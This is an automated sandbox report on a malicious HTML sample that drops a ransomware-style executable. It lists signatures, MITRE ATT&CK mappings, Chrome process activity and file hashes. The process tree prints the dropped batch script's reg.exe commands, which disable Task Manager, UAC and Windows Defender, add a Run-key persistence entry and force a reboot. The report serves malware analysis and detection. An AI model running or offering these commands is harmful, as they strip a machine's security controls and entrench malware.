86672606e2c825d037b853e4d452826f4b2c8e99e73295c66073b43c68aad11a

Resubmissions

03/05/2024, 16:06

240503-tkfplaag3y 6

03/05/2024, 16:00

240503-tf5g6ade47 8

03/05/2024, 15:57

240503-tebtfsde22 10

Analysis

max time kernel
78s
max time network
78s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
03/05/2024, 15:57

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

sample.html
Size

20KB
MD5

170c9de7c0e854c7c329fcb10ce0639a
SHA1

6f1be01abd2bf70d9cd3c4572150ded661845d8e
SHA256

86672606e2c825d037b853e4d452826f4b2c8e99e73295c66073b43c68aad11a
SHA512

15ba7d73d8fae8badc8546a23f0dec38fb476972ae0d1c83d3551d1d1e4e63fae51b01e25dc35a0a7ce815f1a386e0b43d2f8b0fb7aeac868eb57912bf83126d
SSDEEP

384:roN7VzbCFDpmReVoOs4yi9ylKeGMaU8HhhbKrui77S2LjMrSb+0IJCgMmVn:ro7iBVoOs4ymyI1MQBhbYBrMrSeJ2mVn

Score

10^/10

evasion persistence ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2820	HorrorRansom 1.0 Final.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000900000002352b-313.dat	upx
behavioral1/memory/2820-329-0x0000000000400000-0x0000000000A12000-memory.dmp	upx
behavioral1/files/0x000700000002352f-341.dat	upx
behavioral1/memory/2820-344-0x0000000000400000-0x0000000000A12000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
96	raw.githubusercontent.com
97	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp"	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "154"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133592254822729411"	chrome.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
4092	reg.exe
3348	reg.exe
2124	reg.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2696	chrome.exe
2696	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1344	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2696 wrote to memory of 3996	2696	chrome.exe	82
PID 2696 wrote to memory of 3996	2696	chrome.exe	82
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 1916	2696	chrome.exe	83
PID 2696 wrote to memory of 4536	2696	chrome.exe	84
PID 2696 wrote to memory of 4536	2696	chrome.exe	84
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85
PID 2696 wrote to memory of 1544	2696	chrome.exe	85

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9aba4ab58,0x7ff9aba4ab68,0x7ff9aba4ab78
  2⤵
  PID:3996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:2
  2⤵
  PID:1916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:4536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2256 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:1
  2⤵
  PID:4556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:1
  2⤵
  PID:4840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:1996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4516 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:2464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4568 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:1
  2⤵
  PID:3120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1776 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:1
  2⤵
  PID:4004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4836 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4956 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:4072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:4260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5016 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5028 --field-trial-handle=1696,i,8619456930752831831,13708382479998140846,131072 /prefetch:8
  2⤵
  PID:4696
- C:\Users\Admin\Downloads\HorrorRansom 1.0 Final.exe
  "C:\Users\Admin\Downloads\HorrorRansom 1.0 Final.exe"
  2⤵
  - Executes dropped EXE
  PID:2820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\753B.tmp\BobuxGen.cmd""
    3⤵
    PID:4476
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:4092
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1296
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:3348
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      Modifies registry key
      PID:2124
  - - C:\Windows\SysWOW64\reg.exe
      Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:752
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
      4⤵
      Adds Run key to start application
      PID:1032
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r /t 00
      4⤵
      PID:2840

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3332

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa390d855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
9b7635a26adea681ac4a64c506a7e424

SHA1
7bda21427452b9825bc469e685694c041bf65525

SHA256
70dc7c6908098006507718f8c570e64eb41182102579cdd3d3e5c2e94e14a299

SHA512
b098abb324e67e77659283ab73659e782bf04c5fd4599182ae488c330ea07b29db6641729b399b923829637d76f02ef6d446f5f020c23ed8ee70d660c26866f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f52944102614927eed27c439601b0c39

SHA1
05e3553a7f5de7cb19641265d3b3d9047c421553

SHA256
d0a3fba06ad9eb80de178c918a7eb2b98fb0007f4baac15a3bfc99e6890e0142

SHA512
1663a48d65861bb939ccc3644f80cbcc55a53d798d189641d346f3bcd411ff4a954c11ec289c600f1f58e3387a1c24ff09aeb01504c3f696a3783ad7805d0e3b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
f7fa8ce12446985ad806ab598c0111c1

SHA1
2766b925d5710cf4f9cdd1c6ce5116641fe48b3f

SHA256
ab3e6e4b58de84e8f40ca3a95091216453f583c3cd71102ee4be34a33a9e033d

SHA512
87d9a94acf0786707b21580c60bbdb2be15bcea2fb1ff352b555352233c46fae1b4b6952ec0dbdd87b06eb25c26bdd0a0d3d7aec151e937c839ca9a1d566d929

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
0980dae9699177b656f66393fb822f38

SHA1
4cebee460f4f1c3ae70eb08b41e723ed031b4b4b

SHA256
ff67df065a248293e14b85ac8e0d4832aa46b399980a9aacea28e9fe0dabf05d

SHA512
8849d16adcb26fe591c64466bb3448d0f139c3166d9ae2eaba55dd10db80dfb12e5cffd7f98dfec193400df60ff5d7fbe895ae15549b3ab2568c00fc27de7b41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
0d6b8c9edddc03da810f6ad84522f39f

SHA1
db900078cbdad8920d17d551158f627c57b1d526

SHA256
033b8b8d83457fee2c477ca1b903a4771ddd21dd1a72129753b1b73c8c97b7f8

SHA512
1a6d46074e6cf611ad2e740cfde8b84b60369ecb2cbc61c14961098eb9dc4bad206ccb710f384f3b43c4664dbcecfde2e2043a846b4dd293bb09b5b7bedaecb2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
95c7677fc9ba2e627fed4b76db3fd64e

SHA1
d7353ab004ff9a16e14011abfa51db63b4a85bab

SHA256
3a6ade72f5659e5f844fca310d750ec861e6f68de4a492e3a00be55d5e5f0721

SHA512
dd15d408184390333c75605b4c5de2f96f99899186064de9ce073916bb015d297c2501176dfee1474f2ae7996a2ea7b0ab4f3f6476b59b3451050ad824582e53

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
fab5db585e1a69d2fc87d6212b387992

SHA1
5ae64cd36a99c410231695c24a55dcfc63370956

SHA256
c37ff1deaa64c484c6cd5f7e9a059fdbcd7ab7f5e3a828219445ab94c92e498d

SHA512
ba8ce0bb2b89a9f7812bf612f41fdf868f72cb1ac67b6c60385c89775c792e0c5c15f9afa97eb5b049f0eb670a5cc34de609f731d2effb7b56710c868bc1cf50

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
2d823cbdf11648d30f1a44b98945b1c1

SHA1
73897f71a2227cd0fd69eeb962ae904e87baafd9

SHA256
fa3d7f64480227469eafcf7558e13bfb513e48b700c3bc81dc8ecb382fa0a1f6

SHA512
5aac26395abeb21d04a8f2536b069d581714800830613e435fa733eb2445273b9c24fa9821d6a87554faef49d7c3c2aadc6b445c865c2e2f583f3076f4933bb9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
aca3dfbc9d5f76c23b2de2748a925299

SHA1
58be9220a11e97afdcddc2779598512cb254eb1e

SHA256
29f0c4b530f08167b30861af28f6e8c8581ecaa4d83b1ee90b728aacc04bf89d

SHA512
63cb5b9674280934584b0d3f1f21d016b65e8aa90e16f377b6eeacfdcf14b8f6b9db390512492e006fe888819827fb2edda442c32bbcf7829ee9e20932ba062f

Download Submit
C:\Users\Admin\AppData\Local\Temp\753B.tmp\BobuxGen.cmd

Filesize
1KB

MD5
47f426fb3883f2da30e9aa2a7d693fa5

SHA1
50d843d68817717f21ba96d26a571ad996a5e35a

SHA256
